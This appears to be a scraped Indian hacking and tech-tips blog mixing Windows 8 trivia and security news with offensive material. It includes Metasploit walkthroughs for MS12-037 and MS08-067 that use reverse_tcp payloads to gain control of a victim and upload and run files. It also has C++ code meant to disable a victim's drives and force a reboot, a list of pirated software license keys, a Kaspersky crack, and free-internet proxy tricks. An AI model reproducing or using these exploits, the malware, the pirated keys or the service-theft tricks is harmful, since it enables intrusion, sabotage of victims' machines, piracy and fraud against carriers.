A apologist letter and calling for the Intern



Dear Readers,



I am closing this website because i feel that i am violating copyright Laws as well as putting contents for destructions instead of constructions.


Hope reader will understand and will forgive me for all the things i did till date.


Also now I am working lot on security issues and other things like creating a software that cannot be hacked, Launching VOIP server, Launching Programming tutorial website, A bid website, Developing Android software of Mobiles, proving Online Hardware (desktop) supports, Data Recovery from damage disk, final year student project development etc.



So anyone interested to join us can contact us



Author



One more reason for us to be proud to be an INDIAN...


















Lets see how many likes and comments we get for this..!!

These two young kids are not a usual kids. They are Mr Shravan Kumaran (right), Co-founder and President, Go Dimensions and Mr Sanjay Kumaran, Co-founder and CEO, at a press conference, in Chennai on Thursday.


This was their First ever Press Conference held in chennai(Tamil Nadu,India).

Meet Shravan Kumaran and his younger brother Sanjay Kumaran – two of the youngest promoters of a company. Aged only 12 and 10 respectively, Shravan is the Co-Founder and President of Go Dimensions while his brother is Co-Founder and CEO.

When most adults have trouble understanding Java code, these two kids have used the code to build mobile applications. The brothers have together developed four apps for the Apple Store, which have been downloaded more than 10,000 times from 20 countries.

Clad in grey suits and ties, these two highly-confident children demonstrated their apps to the media, on the iOS and Android platforms, for games, education and entertainment.

Students of Vaels Billabong High International School, both Shravan’s and Sanjay’s interest in computers started early at home when their father got them a desktop computer. Starting with Paint and games on the PC, the two started to make presentations at school and teachers encouraged them to do more. That’s how they turned into mobile app developers.

In the CatchMeCop game application, a convict escapes from prison and there is a nationwide hunt for the convict. The convict has to run through a desert, a beach and a maze to outsmart the cops. There are multiple levels of this application, which saw nearly 2,000 downloads in the first month of development. In fact, tech media Web site CNET has reviewed this application too.

The other three applications are Alphabet board, a learning app for the iPhone and iPad; Prayer Planet (for religious prayers of various communities) and Colour Palette, a learning app for kids to learn colours.

The apps are free for download, says Shravan. The company will make money on advertisements in their apps, he said.


**********INDIA IS GREAT*****************

30 Things That You Don't Know About Windows 8




1. A great feature introduced in Windows 8 is Genuine Center, through which you'll be able to enter or change your license key and view the status of your license genuineness.

2. Windows 8 On screen keyboard, can split in two parts and converts in Thumb Keyboard to provide easy access to all keys on a Tablet. 

3. Multitasking has been made easy and more efficient. Windows 8 runs two different UI simultaneously. 

4. Apps can communicate with each other in Windows 8. 

5. Gesture-based navigation is intuitive and fast. 

6. The most unique feature of Windows 8 is that it offer Multi-Monitor options where on one monitor you can display your start screen and the desktop on the other. 

8. Windows 8 removes the fear of PC failure as it has Push-Button Reset option. 

9. Windows 8 automatically manages to keep the PC up to date without interrupting you inthe middle of your work with the newly featured Windows Update. 

10. In Windows 8 cryptography is much easier. 

11. Windows 8 supports newly designed Smart Screen which is aset of sophisticated technologies to help protect you from malicious websites and programs. 

12. Windows 8 comes integrated with built-in drivers that support a broad range of devices, including printers, sensors, touch-input devices, and displays. 

13. Secured boot stops malware in its tracks and makes Windows8 significantly more resistant to low-level attacks. 

14. Windows 8 allows mobility and connectivity virtually from anywhere. 

15. In Windows 8 DirectAccess helps remote users to securely access resources within a corporate network. 

16. AppLocker has been enhanced with richer capabilities & enables to manage both desktop and Metro style applications. 

17. Business users can save their data from unauthorized access as Windows 8 comes preloaded with new version of BitLocker. 

18. Windows 8 introduces Windows store from where you can find the apps you want, ranging from exciting new games, to the productivity tools and many more. 

19. Windows 8 intends many new features for business users. 

20. You can set Windows 8 to auto refresh which eliminates the need of pressing F5 again and again. 

21. Windows 8 provides a reset option, which restores the PC to the state it was in when originally purchased in case a major PC failure happens. 

22. You can integrate your Windows live ID account in Windows 8, hence eliminating need of creating a separate user account locally. 

23. Windows 8 is going to feature built-in Cloud Apps and services with SkyDrive. 

24. Protecting the pre-OS environment with UEFI. 

25. Windows 8 is also likely expected to comprehend the Calling and SMS capabilities on 3Gsupported tablets. 

26. Driver developers can use the new, integrated Microsoft Visual Studio development environment to increase productivity and develop richer applications. 

27. Windows 8 supports a broadrange of app programming languages (for example, C,C++,HTML5,CSS3,DirectX 11.1,XAML). 

28. Windows 8 offers Windows Push Notification Service through which apps can receive secure messages from your website, and send them to your apps live tile or provide a notification to the user. 

29.Windows 8 integrates support for contact selection directly within Windows using its feature Contact Picker. 

30. Windows 8 supports Mobility & Connectivity on the Go for business users. 

******LIKE & SHARE******

How to Know a Malicious Link Without Clicking It



























Even the best security software can’t protect you from the headaches you’ll encounter if youclick an unsafe link. Unsafe links appear to be shortcuts to funny videos, shocking news stories, 

awesome deals, or “Like” buttons, but are really designed to steal your personal information or hijack your computer. Your friends can unknowingly pass on unsafe links in emails, Facebook posts, and instant messages. You’ll also encounter unsafe links in website ads and search results. Use these link-scanning tips to check suspicious links. All of these solutions are free, fast, and don’t require you to download anything..

Hover Over the Link-

Sometimes a link masks the website to which it links. If you hover over a link without clickingit, you’ll notice the full URL of the link’s destination in a lower corner of your browser..

Use a Link Scanner-

Link scanners are websites and plug-ins that allow you to enter the URL of a suspicious link and check it for safety. There are many free and reliable link scanners available; I suggest you try URLVoid first. URLVoid scans alink using multiple services, such as Google, MyWOT, and Norton SafeWeb, and reports the results to you quickly..

Check Out Shortened Links..

Hacking windows using MS12-037 Internet Explorer Same ID Vulnerability




Hi Readers members, Today i am going to explain how to hack the Windows system using the recent IE exploit. This article is intend to educate PenTesters.

Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability."

 Two technologies in modern OS are used to make exploits of this sort harder: DEP (data execution prevention) and ASLR (address-space layout randomisation).

DEP is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow. (wiki)

ASLR loads software modules such as DLLs into memory at randomised locations. Moving system DLLs around makes it harder for hackers to guess where to find the library functions they need, such as URLDownloadToFile() and CreateProcess().

But DEP and ASLR don't make remote code execution attacks impossible -just trickier.

In the case of CVE-2012-1875, ASLR can be bypassed by trying to force Internet Explorer to find and load an old version of the Microsoft C runtime DLL - one which was compiled before ASLR become the norm, and
therefore doesn't support it. Whenever you load a non-ASLR DLL, even into an ASLR-enabled program, you can predict where it will end up.

And DEP is bypassed using a technique known as ROP, or return-oriented programming.

Exploit for the Internet Explorer Same ID Vulnerability (CVE-2012-1875 ) :

Requirements :

Target OS: XP3
Attacker OS : Backtrack or any PenTesting Distros

As usual , you have to create two VMs in your VirtualBox.

Preparing victim system:
Install the XP3 in one of the VM. Change the VM's Network adapter to the Host-only-adapter. (if you don't know what i am talking about, then please use this Virtualbox manual)

Preparing the Attacker system:
Update the Metasploit modules by entering the following command in Terminal:
msfupdate

Or you can download the 'ms12_037_same_id.rb' module and paste in this directory "/opt/metasploit/msf3/modules/exploits/windows/browser/"

Configuring settings for the exploit in Metasploit:
Open the Terminal and type "msfconsole" to get the Metasploit console.

Type " use exploit/windows/browser/ms12_037_same_id" in the console.

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Ok, let us launch the exploit.

Type "exploit" in the console.

Now the exploit is started. Our exploit is running at "http://192.168.56.10:8080/".

Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] Client requesting: /
[*] Using JRE ROP
[*] Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1685) 


Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter.

Now , You can control the victim system from computer using meterpreter.

For example:

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

How to create CON folder in windows



Not only CON, we cannot create any of these-

CON, PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9 and more.. The reason is that con, prn, lpt1.. lpt9, etc are underlying devices from the time dos was written. So if u r allowed to create such folders, there will be an ambiguity in where to write data when the data is supposed to go to the specified devices. In other words, if i want to print something, internally what windows does is -- it will write the data to the folder prn (virtually u can call it a folder, i mean prn, con, etc are virtual folders in device level). So if we are able to create con folder, windows will get confused where to write the data, to virtual con folder or real one.

So Now, Try this...

Open the Command prompt by 
Start -> Run and typing cmd

Code:-
C:\> md \\.\c:\con

Now, Open My Computer and browse through the path where you created CON folder... Surprising.. ?? Yeah.. you have created it successfully

Now, try to delete the folder from My computer
OOPS!!! You cant delete it...

Now, try this in command prompt console

Code:-
C:\> rd \\.\c:\con 

Yeah!! You did it...


******SHARE IF YOU LIKE THIS********

ALL SOFTWARE KEYGENS



3D Studio Max 4 :::: Number: 226-19791979 / CD Key: XLSQBQ
-Adobe Golive 4 :::: GJW400R2100006-625
-Adobe InDesign :::: IPE123R12345678-337
-Adobe PageMaker 6.5 BR :::: 03-5004-201500745 
-Adobe PageMaker 7.0 :::: 1039-1121-2998-7586-7388-7545
-Adobe Premiere 6.0 :::: MBF500B7205104-998
-Adobe Premiere 7.0 PRO:::: 1132-1381-7346-2847-2617-6783
-Aldus Photo Styler 2.0 :::: 15-1001-000000001
-Adobe Framemaker 7.0 :::: 1030-1208-8265-3458-9287-7077
-Adobe Premiere 6.0 :::: MBF500B7205104-998
-Adobe Premiere 6.5 :::: MBE600R7100024-900-960
-Adobe Premiere Pro v7.0 :::: 1132-1381-7346-2847-2617-6783
-After Effects 5.5 :::: EWW470R1001999-030-259
-Aplicativos Comerciais :::: 2003 0947201
-Architectural Desktop 3.3 SERIAL :::: 400-12345678 / CD KEY: T4ED6P

-AutoCad 14 :::: 117-99703105 / W36H / C3DF32EA
-AutoCad 2002 SERIAL :::: 400-12345678 / CD KEY: T4ED6P
-CakeWalk Home Studio 2004 :::: CWHS2.20-003021
-CakeWalk Home Studio 2002 XL :::: 2002 XL CWHX1.02-002397
-CakeWalk Pyro 2003 :::: CWPY200333333 / MP3: 95F5AGFD
-CorelDraw 8 :::: DR-8XR-23969F-63
-CorelDraw 11 :::: DR11CRD-0012082-DGW
-CorelDraw 12 :::: DR12WEX - 1504397 - KTY
-Curso - Flash 4 :::: 540234330 / 55623255258 / 5279103
-Delta Translator :::: DTR2-29108-84895-00412-18
-Dicionário Michaelis V.5.0 BR :::: CD6BL9805083
-Easy CD Creator 5.2 :::: G332NB-MGJNH-ZFVPB
-Easy CD Creator 5 :::: P-7TGQ4-G06CM-N5G1L

-Easy CD Creator 6 :::: BD-JWZS4-QX3MR-0241L
-Easy Media Creator 7.0 serial :::: YN-Y7WVY-CQXG6-K3KWZ
-Enciclopédia de Tomografia Comp. LEE :::: RUSR23351
-Empresário 3 serial :::: e3co-1-co-065-00-00-m1oe111
-English Teacher :::: 03231183
-Exchange 2000 Server :::: KRJQ8-RQ822-YRMXF-6TTXC-HD2VM
-Globalink Power Translator 6.4 :::: PT6PU7-6.41-698-0474
-Guia do Sexo :::: 3746
-Houaiss :::: DHS-21771533
-Inventor 4 :::: 202-12345678 / CD KEY: G4ED6P
-James Bond 007: NightFire :::: 1740-9488245-5171152-5578
-Jurissíntese Millenium :::: JS164-29
-Kylix 3.0 :::: 6AKT-TE29VM-7GZV6D-28?Y / Aut. Key: GFW-?RW

Macromedia Studio MX :::: WSW600-59791-91721-99978
-Make Money 2.0 :::: PRF 0200153
-Mechanical Desktop 6.0 :::: 400-19791979 / CD-Key: TLSQBS
-Norton System Works 2005 :::: BBCQ-9BCY-PKCX-GJPD-GYTK-HKGJ
-Norton Inter Security 2005 :::: BBCY-PK26-GKCP-7BCM-VY22-3VMF
-Office 2000 :::: GC6J3-GTQ62-FP876-94FBR-D3DX8
-Office 2003 :::: GWH28-DGCMP-P6RC4-6J4MT-3HFDY
-Office XP Full BR :::: HXT2X-8CDBF-HYY8H-TYJ7Q-HMHHG
-Ominipage 11 :::: 2889A L00 500020
-Page Maker 7.0 :::: 1039-1121-2998-7586-7388-7545
-Photoshop 5.5 BR :::: PWB550E7100088-110
-Photoshop 6.0 BR :::: PWW600R7105467-948
-Photoshop 7.0 :::: 1045-1209-6738-4668-7696-2783
-Photoshop 8 CS :::: EWW470R1001999-030-259
-Photoshop Elements :::: 1057-4422-1198-0751-6983-5530
-Plus Windows :::: 95 411-1410701
-Project98 BR :::: 1112-1111111
-Project Server BR 2003 :::: WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM
-QuarkXPress 5.0 :::: 39173027QHSKKJF3199PYJX2
-RoboHelp Enterprise 2002 :::: REF22-C3E40SHK
-ROXIO EASY CD & DVD CREATOR SUITE 6.0 :::: BD-JWZS4-QX3MR-0241L
-Seagate Crystal Reports 8.5 :::: A6A50-8900008-ZE1007S
-Seagete Crystal Reports 9.2 :::: AVS50-81SG00S-G61002U
-SIC 3.02 Serial :::: 12D2-2501-8410-32X0-6752 / Série: 060086
-Sound Forge 5 :::: 3B-9FWG9Z-T60ZYS-0QZY0D
-Ulead Vídeo Studio 8.0 :::: 81102-86000-13994421
-Via Voice :::: RPB000049301

-Visual Kit 5 V.6.0 :::: W60.000.001.425-789
-Visual Kit 5 V.7.0 2003 :::: U5R.
-Visual SouceSafe 6.0 :::: 885-2814463
-Visual Studio 6.0 :::: 111-11111
-Visual Studio.net :::: D64GG-GXY6T-V6FTR-WCPBB-2YDYB2
-Win DVD 2000 :::: GMR22WGYXPUB8LH
-Winace :::: ACEQ79TFDSWXC3H4R64
-Windows 95 :::: 28595-OEM-0005727-80940
-Windows 98 :::: KGGJF-Q3HCX-88JJV-DM3KH-VY6VQ
-Windows 98SE :::: XJ3XX-YR4CJ-TQD6J-76QJR-GJMJB
-Windows 2000 Server BR :::: M2GHT-V6YK6-P6Q9D-PRCXF-FCWXT
-Windows 2003 BR :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows 2003 Server :::: QW32K-48T2T-3D2PJ-DXBWY-C6WRJ
-Windows ME :::: Q7JRD-HH6DG-RD4BK-H93DF-DQ4FG
-Windows ME Completo :::: B6BYC-6T7C3-4PXRW-2XKWB-GYV33
-Windows NT 4.0 :::: 419-0949015

-Windows XP Corporate :::: FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8
-Windows XP CORPORATE C/SP2 :::: VDDF2-JJWM3-X7P27-FRHRT-8BVHT
-Windows XP Home BR :::: K8GMG-PRV3M-VG2JH-DJJ48-RY7FV
-Windows XP Professional C/SP2 BR :::: BX6HT-MDJKW-H2J4X-BX67W-TVVFG
-Windows XP Professional - Inglês :::: FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8
-Windows XP BR :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows XP Server :::: BJXGH-4TG7P-F9PRP-K6FJD-JQMPM
-Windows Server 2003 Enterprise Corporate Edition :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows 2003 Standard Server :::: M6RJ9-TBJH3-9DDXM-4VX9Q-K8M8M
-Windows 2003 Web Server :::: d42x8-7mwxd-m4b76-mkyp7-cw9fd
-Windows 2003 Server Corporate 3 in 1 :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows 2003 Server/Enterprise/MSDN :::: QW32K-48T2T-3D2PJ-DXBWY-C6WRJ

Important news for all internet user


Guys important news for all internet user. There is active of virus which delete yous dns and if u r infected with this virus then you will not be able to use internet after 9th of this month, news by FBI


To check you r infected with this virus or not then click on the below link and if it say green then u r safe and if its red then u r infected.

DNS checker website


more information over at the DNS Changer


Working Group.


( http://www.dcwg.org/ Ensure that the DNS Servers are not within the following range of Internet Protocols (IPs): -

85.255.112.0 through 85.255.127.255 - 67.210.0.0 through 67.210.15.255 - 93.188.160.0 through 93.188.167.255 - 77.67.83.0 through 77.67.83.255 - 213.109.64.0 through 213.109.79.255 - 64.28.176.0 through 64.28.191.255 

If DNSChanger is detected, users may use software from McAfee, Kaspersky Labs, Microsoft, Norton, or Trend Micro to clean the infection.

How to hack a remote computer??



















By exploiting the parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability. 


Details about Server Service Vulnerability(MS08-067):


Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.

This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

*Requirements*

1. VirtualBox
2. Backtrack 5
3. Target OS(XP)

Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5". Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

"I use different method for finding the ip address of victim. For Eg., By sending link that will get the ip details or use Angry IP Scanner."

Step 3: Information Gathering
Now let us collect some information about the Target machine. For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12". Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.

Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi". Now you can see the list of modules match with the netapi.

We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10". Here 192.168.56.10 is IP address of Backtrack machine. You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12". Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

Preventive Measures:
Update your Windows OS frequently..

All India Working Airtel Free 3G Internet 2012


Hi, Friends this is latest working Free 3G Trick All over India.
Its Working in phone and pc both.

You can download big files (more than 500mb) too with this proxy.

Create new Configuration Settings:-

APN:- airtelgprs.com
PROXY ADD:- 69.10.57.138

port:- 80

home page:- m.twitter.com
or
fb.me (for Gujarat)
or
Any free opening site in your state.
Done.
Enjoy

You can use phone's default browser or in pc too..

Free Unlimited 3G Internet hack for BSNL


Today I came across a BSNL 3G internet hack , so i planned to post it here also. You can surf Free unlimited internet in 3g with this hack.

Requirements:
 

3G supported device
3G activated sim(it is easy to activate 3g in normal sim)
Knowledge to change internet settings

Just change the Internet settings with the following details. BSNL 3G hack setting:

Name :BSNL 3G
Service Type 1 WAP
Gateway IP : 1 10.100.3.2
Port no : 1 : 9209.
Timeout: NEVER
CSD No.1
User Name1: ppp
Password1: ppp123
APN setting:
wapwest.cellone.in
User Name : ppp
Password : ppp123

use this settings and enjoy the free Internet service at 3Mbps speed.
http://10.100.3.2/
10.100.3.2

Trick to type slowly



*Open Notepad.
*Paste the following code in the notepad file:

WScript.Sleep 180000 
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

*Save file with any name & with .vbs extension & close it.
Now open the file & see how freakishly slow the messages appear!

C++ Batch Virus code to disable All Hard disk


Hi friends, here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also..

#include < windows.h > #include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\Hackersgrp.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\Hackersgrp.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; 

}

Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp

*Note:-
Don't run this c++ program, it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.

Docomo Hispeed Free Gprs


Here is the newest ip of docomo working with great speed here is the ip. "220.226.181.88" use divein settings with above bal rs.1. For opera use http server as: http://220.226.181.88.server4.operamini.com/

Tested and working in southern states. Try in yours.

Windows 8 operating system will ban Firefox and Chrome

A new version of the Windows 8 operating system could shut out browsers such as Firefox and Chrome, according to Mozilla. Microsoft has been saying all along that x86 apps wouldn't run on Windows on ARM and it explicitly said there would be no third-party code on Windows RT when it announced the details of the platform back in February. 


That's no plugins for IE on the Windows RT desktop as well as no desktop Firefox and Chrome. According to Mozilla, the makers of Firefox, Microsoft is planning to allow only one fully-functioning browser on Windows RT: Microsoft's own Internet Explorer. Writing on the Mozilla blog, Harvey Anderson, general counsel for the company, lashed out at Microsoft for the slight, and called the alleged move "an unwelcome return to the digital dark ages where users and developers didn’t have browser choices."

Why is Mozilla focused on Microsoft? Anderson's answer: Microsoft is a different beast. "The difference here is that Microsoft is using its Windows monopoly power in the OS market to exclude competition in the browser market," Anderson said, possibly referring to Microsoft's dominance of the entire operating system space, not only mobile.

The fully featured version of Firefox will be allowed to run on Intel-based Windows 8 tablets. It's only Windows RT where there will be a problem. Microsoft also declined to comment on Mozilla's accusations.

Google Wallet PIN Cracked by Brute Force Attack

First, the sky is not falling and chances are you are safe, but if you use Google Wallet, you should know that the PIN security has been cracked. Who is affected? You are vulnerable if: 




You have a phone with Google Wallet set up 
Your phone is rooted 
You don’t use lock screen security (PIN, pattern, face unlock, etc) 
You lose your phone 


Basically, you need either a Nexus S or Galaxy Nexus that has been rooted. Everyone else can stop reading now. 



What happened? 

Google Wallet stores your four-digit PIN number in a database on the phone. It uses SHA256 hex-encoding, which means all that is needed to crack the encryption is to generate at most 10,000 SHA256 hashes…a simple task for any smartphone to accomplish. This is called abrute-force attack. 

Google knows about this issue, but to fix it and make it more secure, they would have to move the PIN security to be maintained by your bank. This would force Google to update their terms of service and would require us to trust in the bank’s security. We’re not sure at the moment if this will happen. The banks may decide to simply take the risk of leaving it as it is rather than take on the responsibility of maintaining the PIN security. 

Another possible fix would be to switch from a four-digit PIN to a more secure password that requires at least six digits and a mix of letters and numbers. We’re used to these types of passwords online, but not when you’re trying to check out at a store and there are people in line behind you. Plus, anything more complicated than entering a four-digit PIN would essentially kill the product since it would simply be too inconvenient to use. I doubt this will happen. 

How can I protect myself? 

The best thing you can do to protect yourself is to configure a passcode on your lock screen. If you are rooted, you could unroot, but I’m sure most people who are rooted want to stay that way. Of course, the most important thing is to not lose your phone. 

See the vulnerability in action.The folks at zvelo have posted up a video showing how easy it is to crack the PIN.

Click for video

Download Kaspersky antivirus with 100% genuine key 2012



As we are providing genuine, authenticated and 100% purchased key for Kaspersky Antivirus 6.0 Workstation.

Further we are planning to sell this authenticate key to approximate 115 user, as we have 115 nos of key available.

We have fixed Rs.200/- for each license key, if wanting to purchase contact us on the below given details.


Author
Ph No.- +91-823513228, +91-7735622630



If you have any complain or suggestions plz dont forget to put comments......

Main Differences between windows 7 and windows 8


1)boot time: win7 48 sec. win8 10 sec. 

2)desktop : Microsoft has replaced the normal shortcut icons with dynamic tiles. You can change their size and place similar applications around each other- or anything else
that my suit you.


3)mounting iso images: Windows 7 could only burn an ISO image to a DVD but Windows 8 actually betters this by offering you the option to mount the image too. In Windows 7, you didn’t have the option to make virtual drives to use the ISO image’s content but Windows 8 allows you to create a virtual drive to mount the ISO image so that you can easily use it just like a normal DVD.

4)Built-in Antivirus(bad news for hackers): Windows 8 has an antivirus present inside the kernel of the operating system. This means that your system won’t boot if a corrupt USB device is plugged in. It sounds impressive though I don’t know whether it would pass the test of time…. and viruses! All in all, I do expect Windows 8 to be a serious upgrade on Windows 7 and with Microsoft working on the things that require some tweaking; I genuinely believe that Microsoft is finally ready to launch an OS which will take the world by storm 

5)Multiple monitors support in Windows : Microsoft announced that customers can use ore than one monitor to connect with Windows 8 operating system. Windows 8 PC management allows customers to use multiple monitors at same time. It means Windows 8 offers flexibility by allowing start screen at one monitor and desktop in another. Customer can also choose taskbar on both screens with different icons on each monitor. Moreover, you can play with background images as well by changing it separate on each monitor. 

Such support is not available with Windows 7 operating system.

6)Windows based apps store Windows 8 operating system introduces new app store in which different apps is implemented for various devices and settings on right of the screen.
The settings section includes contextual apps like volume, brightness, restart and power
options. You can share content, links, app reviews, contacts, metro apps, facebook and twitter applications with your friends or colleagues. Windows 8 store offers both desktop apps and ecosystem for developers. On the other hand, Windows 7 OS is missing all these features.

7)Inbuilt Windows Touch features: The main difference between Windows 7 and Windows 8 comes with its metro style interface that provides live title of rectangle shape which has replaced the icon pattern in Windows 8. In Windows 7 operating system, software shortcuts are in the form of icons. As far as the touch interface is concerned then Windows 7 supports touch interface but not that much, what was expected. 

So, Windows 8 comes with true touch interface for Metro style apps. It is fast way of accessing data by using an improved on-screen keyboard and handwriting recognition


Kaspersky 2012 for 345days HURRY!!


Hi Guys Today I am going to tell you how to Crack Kaspersky 2012 for 345days... 
This can be done in simple steps.. 
Just follow this.. 
1) Download the kaspersky setup From he below link... 
2) and also download the text file and key file 
download link of both the file is under description.... 
Now lets start...!!! 

NOTE:- Disconnect your internet connection before proceeding 

Run the kaspersky setup file.. 
Now click on Insert activation code or manage license from the right bottom of the kaspersky window 
click on enter activation code and.. put the code which you have download.. (txt file) 
open text file and copy the key and paste at the kaspersky window... and click on next... 
then browse the key file which you have download... 
then click on activate option.... 

Now you have done.. 
Your kaspersky licence will show 345days remaining..... 
Enjoy guys.. 
Downloading Link:- 
setup.exe:-http://www.mediafire.com/download.php?p70ji149lf5sj4l 
Licence.txt:-http://www.mediafire.com/download.php?o0xrom0vkvdkv6z 

password for unloking the file :- Redeyehack

If you failed to perform any of the step correctly, kaspersky will detect you and you will no longer will able  to perform crack again on the same pc.
problem arises contact me...



25 Most Surprising Computer-Internet-Virus Facts


Here is a collection of 25 Most Interesting Computer Facts about Funny Computer & Internet facts. Just Have a Look, & you will sure get Surprised

The Surprising Facts are :
1. Another name for a Microsoft Windows tutorial is ‘Crash Course’!
2. Bill Gates house was designed using a Macintosh computer .
3. 80% of all pictures on the internet are of naked women 
4. By the year 2012 there will be approximately 17 billion devices connected to the Internet.
5. Domain names are being registered at a rate of more than one million names every month.
6. E-mail has been around longer than the World Wide Web.
7. For every ‘normal’ webpage, there are five porn pages .
8. In the 1980s, an IBM computer wasn’t considered 100% compatible unless it could run Microsoft Flight Simulator .
9. MySpace reports over 110 million registered users. Were ita country, it would be the tenth largest, just behind Mexico.
10. One of every 8 married couples in the US last year met online.
11. The average 21 year old has spent 5,000 hours playing video games, has exchanged 250,000 e-mails, instant and text messages and has spent 10,000 hours on the mobile phone.
12. The average computer user blinks 7 times a minute, less than half the normal rate of 20.
13. The first banner advertising was used in 1994.
14. The first computer mouse was invented by Doug Engelbart in around 1964 and was made of wood.
15. The first domain name ever registered was Symbolics.com.
16. The world’s first computer, called the Z1 , was invented by Konrad Zuse in 1936. His next invention, the Z2 was finished in 1939 and was the first fully functioning electro-mechanical computer.
17. There are approximately 1,319,872,109 people on the Internet.
18. There are approximately 1.06 billion instant messaging accounts worldwide.
19. While it took the radio 38 years, and the television a short 13 years, it took the World WideWeb only 4 years to reach 50 million users .
20. 70% of virus writers work under contract for organized crime syndicates .
21. A program named “Rother J” was the first computer virus to come into sight “in the wild” — that is, outside the single computer or lab where it was created.
22. The worst MS-DOS virus ever, Michelangelo (1991) attacked the boot sector of your hard drive and any floppy drive inserted into the computer, which caused the virus to spread rapidly.
23. A virus can not appear on your computer all by iself. You have to get it by sharing infected files or diskettes , or by downloading infected files from the Internet.
24. Country with the highest percentage of net users is Sweden (75%) .
25. The first popular web browser was called Mosaic and was released in 1993 .

TRICK TO BLOCK WEBSITES IN MOZILLA FIREFOX,OPERA AND IE


You can easily and effectivily block access to a website by adding it to your Windows HOSTS file.(Yes, Hosts is capitalised for some strange reason). Without any software. Doesn't matter what browser that you use.

1.Go to your HOSTS file which is located at:
